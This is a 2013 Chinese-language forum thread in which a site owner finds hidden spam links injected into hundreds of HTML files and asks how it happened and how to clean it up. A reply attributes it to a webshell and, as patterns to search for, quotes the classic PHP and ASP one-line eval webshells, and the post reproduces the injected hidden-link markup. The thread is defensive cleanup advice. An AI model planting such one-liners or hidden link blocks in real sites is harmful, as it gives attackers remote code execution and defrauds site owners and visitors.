网站下的所有html、htm文件被写入一堆内容，可以通过正则判断把这些黑内容一次替换掉吗？

This topic created in 4771 days ago, the information mentioned may be changed or developed.

用grep查了下，受影响的文件有369个。
可以通过find或者sed把这些黑内容给清除掉吗？
黑内容如下：
<table style="margin-top: 20px;" align="center" width="968" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td width="450"><style type="text/css">
#weblink1{width:100px;height:20px;line-height:20px;main-left:0px;main-bottom:10px;overflow:hidden;position:absolute;top:600px;left:0px;}
#weblink1 a{display:block;font-size:12px;line-height:20px;text-decoration:none;font-family:Arial;cursor: default;}
</style>
<div id="weblink1"><a href="/">.</a><a href="/">.</a>
…… （此处为一行又一行的链接）
</div>

提问一：想请问下这些内容是通过什么方式写入的？
提问二：能通过正则判断把这些黑内容一次替换掉吗？
提问三：是因为账号被泄露，还是因为程序有漏洞呢？

谢谢.

Supplement 1 · Apr 21, 2013

在@laoyu 的帮助下解决了，非常感谢。

20px

width

weblink1

15 replies • 1970-01-01 08:00:00 +08:00

laoyu

Apr 21, 2013

第一：基本可以判断是用webshell批量挂的黑链
第二：能
第三：不一定帐号被泄露但肯定程序有漏洞，最好把账户密码改掉，然后查找把漏洞补上，如果不是什么大站80%是注入引起的，你就说下你用的什么程序，再分析！

laoyu

Apr 21, 2013

补充一下
如果是开源或者公开的程序，说一下是什么程序，我帮你分析下漏洞原因。
光清除黑链也没什么用，可能webshell还在，或者一句好木马还在。

先查木马吧，全站查找类似如下：

如果是PHP: <?php @eval($_POST['pass']);?>
如果是ASP: <%eval request("pass")%>